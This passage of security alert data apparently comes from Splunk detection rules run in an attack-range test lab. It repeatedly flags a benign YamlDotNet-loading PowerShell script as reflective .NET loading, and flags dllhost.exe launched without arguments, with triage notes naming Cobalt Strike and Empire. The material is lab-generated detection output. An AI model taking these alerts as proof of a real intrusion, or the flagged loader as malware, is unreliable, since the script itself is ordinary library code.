Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T09:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T09:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664787600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664787600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="4132", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664787600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664787600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x1024", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664790932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T08:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T08:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664790932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T08:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T08:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664790932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T08:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T08:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664790932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T08:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T08:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664784000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664784000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="3684", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664784000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664784000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0xe64", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664787332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T07:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T07:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; 